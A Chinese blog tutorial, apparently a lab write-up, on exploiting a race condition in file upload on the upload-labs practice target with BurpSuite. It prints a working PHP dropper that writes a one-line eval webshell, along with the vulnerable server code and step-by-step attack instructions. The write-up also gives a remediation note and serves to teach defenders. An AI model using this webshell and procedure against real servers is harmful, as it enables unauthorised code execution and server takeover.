【文件上传漏洞12】竞争条件攻击

已于 2022-07-01 02:36:40 修改
阅读量4.6k 收藏 8
点赞数 1
分类专栏: # 筑基07:WEB漏洞原理 文章标签: php 安全 web安全 文件上传
于 2022-03-18 13:06:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fighting_hawk/article/details/123436472
版权

目录

1 概述

  1. 竞争条件攻击:一些网站上传文件的逻辑是先允许上传任意文件, 然后检查上传的文件是否包含WebShell脚本,如果包含则删除该文件。这里存在的问题是文件上传成功后和删除文件之间存在一个短的时间差(因为要执行检查文件和删除文件的操作),攻击者就可以利用这个时间差完成竞争条件的上传漏洞攻击。
  2. 分析:由于网站会检查客户端所上传的文件,但是不会检查其自己生成的文件,利用时间差让服务器生成一个他自己信任的WebShell脚本文件。

2 实验简介

2.1 实验目的

掌握利用业务逻辑漏洞、进行竞争条件攻击的方法,验证文件上传漏洞的存在。

2.2 实验环境

  1. 靶场:基于WAMP环境的upload-labs靶场,搭建过程可参考文章《基于WAMP环境的upload-labs漏洞测试平台搭建过程》。
  2. 攻击机:安装BurpSuite软件。

2.3 实验前准备

  1. 攻击者一般先准备一个txt文件,输入以下代码,并重命名为get.php。该文件被执行时将在同文件中生成一句话木马文件shell.php,连接密码为111。
<?php
fputs(fopen('shell.php','w'),'<?php @eval($_REQUEST[111]);?>');
?>

3 实验过程

  1. 真实机打开BurpSuite,进入proxy模块,打开自带浏览器访问靶场第18关,查看提示说需要代码审计。
    在这里插入图片描述
  2. 点击显示源码,显示网页对客户端所上传的文件检验代码如下。
    1. 第11行代码的判断条件中,先是执行了文件上传函数,然后根据文件上传是否成功再执行 if 语句函数体。
    2. 第12行代码中,函数判断所上传的文件后缀名是否在所列的白名单内。
    3. 也就是说服务端是先将文件上传了,再判断要不要删除,及时看起来是连着执行的,但还是存在极小的时间差,存在被利用竞争条件攻击的可能。
$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错!';
    }
}

  1. 在浏览器中选择上文准备好的文件get.php,先不点上传按钮。
    在这里插入图片描述

  2. 将BurpSuite的拦截功能开启,点击网页的上传按钮,可以看到BurpSuite拦截到请求如下,将其发送到intruder模块。
    在这里插入图片描述

  3. 在intruder模块中,点击clear将软件默认设置的变量删除掉。
    在这里插入图片描述

  4. 将payload进行如下设置。
    在这里插入图片描述

  5. 切换到resource pool界面,进行线程数量设置,此处需要新建一个并设置线程数量为50。本实验版本是V2021.12.1,之前网上找的资料估计是其他版本的,设置位置差异较大。
    在这里插入图片描述

  6. 点击右上角的开始攻击按钮。

  7. 打开浏览器输入http://192.168.1.4/upload-labs/upload/get.php一直刷新访问文件上传的文件,看到显示页面如下,就表示文件还来不及访问执行已经被删掉了。
    在这里插入图片描述

  8. 不要气馁,一致刷新访问,就会有惊喜,可以看到这次显示不一样,但是弹出的警告表示没有权限打开文件。
    在这里插入图片描述

  9. 进入靶机对应文件夹内,将upload文件夹权限修改为完全控制,并点击确定。
    在这里插入图片描述

  10. 再次一边攻击一边刷新页面,可以看到某一个刷新时显示为空白,就表示代码已经被成功执行了。
    在这里插入图片描述

  11. 打开靶机,查看到文件夹下确实已经成功生成了一句话木马文件,攻击完成。
    在这里插入图片描述

4 总结

  1. 理解业务逻辑漏洞的分析思路,该靶场是先保存后再删除,就存在这样的可利用漏洞,正确的开发思路应该是先对一切客户端的输入(包括文件)过滤没问题后,才允许进入服务端。
  2. 掌握利用竞争条件攻击逻辑漏洞的方法,该方法将适用于一切存在时间差的业务逻辑漏洞。

参考文献

  1. 通过条件竞争进行文件上传
Fighting_hawk
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
漏洞攻击文件上传条件竞争
BlackBtuWhite的博客
01-18 872
扫描得知有关键的flag.php页面和upload文件根路径和upload.php页面,php文件查看了都没有渲染有用的信息…在服务器释放上传的php文件之前先让该文件被执行,那么操作权就在我们手上了,这里我们让生成蚁剑的webshell木马,再通过提权webshell获取源码拿到flag。只有一个upload前端标签元素,并且上传任意文件都会跳转到upload.php页面,判定是一个apache容器,开始扫描web目录,查看是否有机可乘。2.访问时间在上传文件之后,且服务器还未将其删除,文件存在。
文件上传漏洞条件竞争
柠檬i的博客
08-28 1439
这段代码逻辑是文件上传后先保存文件,然后判断是否符合规则,符合的话改文件名,不符合的话删除文件。 在多线程环境中,可能会存在文件还未来得及删除,我们便访问到该文件,可以以此为切入点执行php语句。
iwebsec靶场文件上传漏洞-竞争条件文件上传
qq_56041380的博客
03-30 754
竞争条件是指多个线程在没有进行锁操作或者同步操作的情况下同时访问同一个共享代码、变量、文件等,运行的结果依赖于不同线程访问数据的顺序。源码分析。
iwebsec靶场 文件上传漏洞通关笔记7-竞争条件文件上传
mooyuan的博客
04-21 1011
通过对iwebsec靶场文件上传的第七关卡讲解条件竞争法实现文件上传的方法,通过python脚本配合burpsuite工具实现渗透过程。
文件上传绕过】——条件竞争漏洞
weixin_45588247的博客
07-16 4432
文章目录一、实验目的:二、工具:三、实验环境:四、漏洞原理:五、实验过程:1. 场景:2. 实验步骤: 一、实验目的: 1、通过代码审计学习造成条件竞争漏洞的成因。 2、通过upload-labs闯关游戏(Pass-17)闯关游戏,学会条件竞争漏洞利用技巧。 二、工具: 火狐/谷歌浏览器 burpsuite 三、实验环境: 靶 机: windows10虚拟机:192.168.100.150       upload-labs-master闯关游戏      &nbsp
Web安全原理剖析(二十五)——竞争条件攻击文件上传修复
Phantom03167的博客
01-17 782
竞争条件攻击文件上传修复
文件上传漏洞总结
太阳照耀我走四方
07-10 1364
文件上传漏洞是指用户通过界面上的上传功能上传了一个可执行的脚本文件,而WEB端的系统并未对其进行检测或者检测的逻辑做的不够好。
文件上传漏洞(全网最详细)
热门推荐
qq_61553520的博客
04-19 1万+
自从学完文件上传后,寻思总结一下,但一直懒惰向后推迟,最近要准备面试了,就趁此机会写一下。文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。这种攻击方式是最为直接和有效的,所以我们需要思考的是如何绕过检测和过滤。
php条件竞争漏洞,CTF中的条件竞争漏洞
weixin_36304806的博客
03-20 475
条件竞争是沃特?敲黑板,定义:竞争条件发生在多个线程同时访问同一个共享代码、变量、文件等没有进行锁操作或者同步操作的场景中。开发者在进行代码开发时常常倾向于认为代码会以线性的方式执行,而且他们忽视了并行服务器会并发执行多个线程,这就会导致意想不到的结果。线程同步机制确保两个及以上的并发进程或线程不同时执行某些特定的程序段,也被称之为临界区(critical section),如果没有应用好同步技术...
第十三节 文件上传-竞争条件-01
09-15
竞争条件(Race Condition)是文件上传中的一种常见的漏洞攻击者可以利用这个漏洞上传恶意文件,例如 Webshell,从而控制服务器。 文件上传过程: 文件上传过程可以分为以下几个步骤: 1. 客户端上传文件:用户...
渗透测试,文件上传漏洞笔记知识梳理图,适用于学习渗透测试初学者学习,仅供参考学习
06-02
文件上传漏洞允许攻击者将恶意代码以文件的形式上传到目标服务器,从而可能控制服务器、执行任意代码或者利用其他系统漏洞进行进一步攻击。 在Java、PHP、JSP、JXSP等语言环境中,文件上传漏洞往往源于后端验证不足...
逻辑漏洞挖掘文档有截图
07-02
4. 竞争条件竞争条件常见于多种攻击场景中,比如前面介绍的文件上传漏。还有个常见场景就是购物时,例如用户 A 的余额为10 元,商品 B 的价格为 6 元,商品 C 的价格为 5 元,如果用户 A分别购买商品 B 和商品 C,...
信息安全_web狗的生存之道.腹黑.pptx
08-14
文件上传漏洞允许攻击者上传恶意文件到服务器,进而执行代码或获取数据。防范和绕过策略包括: - **JS验证**:利用JavaScript检查文件类型,但攻击者可能绕过验证。 - **大小写变换**:尝试不同大小写的文件名来...
DirtyCow提权漏洞复现(CVE-2016-5195)1
08-08
脏牛(Dirty Cow)漏洞,全称为“竞争条件写入时复制”(Copy-on-Write Race Condition),在2016年被发现,其安全漏洞编号为CVE-2016-5195。这个漏洞主要影响的是Linux内核,特别是从2007年的2.6.22版本到修复前的...
PHP商城案例
王世凡的技术博客
07-26 382
http://www.e9933.com/
PHP框架详解 - symfony框架
最新发布
丁爸的博客
07-28 726
Symphony框架是一个功能强大、稳定可靠、易于扩展和定制的开源Web框架,适用于构建各种类型的Web应用程序。虽然在某些情况下可能会遇到一些性能和学习曲线的挑战,但是通过合理的配置和优化,以及积极的学习和实践,可以充分发挥Symphony框架的优势,构建高质量的Web应用程序。Symphony框架是一个基于PHP的开源Web框架,它提供了一套丰富的组件和工具,可以帮助开发者更轻松地构建高质量的Web应用程序。
c++语言实现类似swoole扩展的项目实践
北风之神Boreas
07-24 383
项目本质其实是C++项目开发,学员学习后增加对C++技术栈的实践能力,毕竟互联网的核心基石依然是C/C++。 当你要改变以前吸收的知识来源于国内视频教程,国内文章教程 国内文章资料 转向全球老外大佬云集的github开源项目吸收时,就要学C和C++ 而你以前的IT技术就是国内的教程 国内的社区 国内的文章 ,但都是有局限的,所以要转向github社区吸收开源项目的东西来增强个人技术体系。 技术只来源于实践,不是光看,光记就会的东西,纸上得来终觉浅绝知此事要躬行。
ecshop网站部署
qq_63926306的博客
07-24 337
ecshop网站部署
文件上传漏洞详解:安全与对策
文件上传漏洞是网络安全中的一个常见问题,它可能导致各种危害,包括系统被植入后门、利用本地文件包含漏洞攻击服务器端库、滥用服务器监控工具以及上传钓鱼页面、恶意文件或非法内容等。 **文件上传漏洞** 文件...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值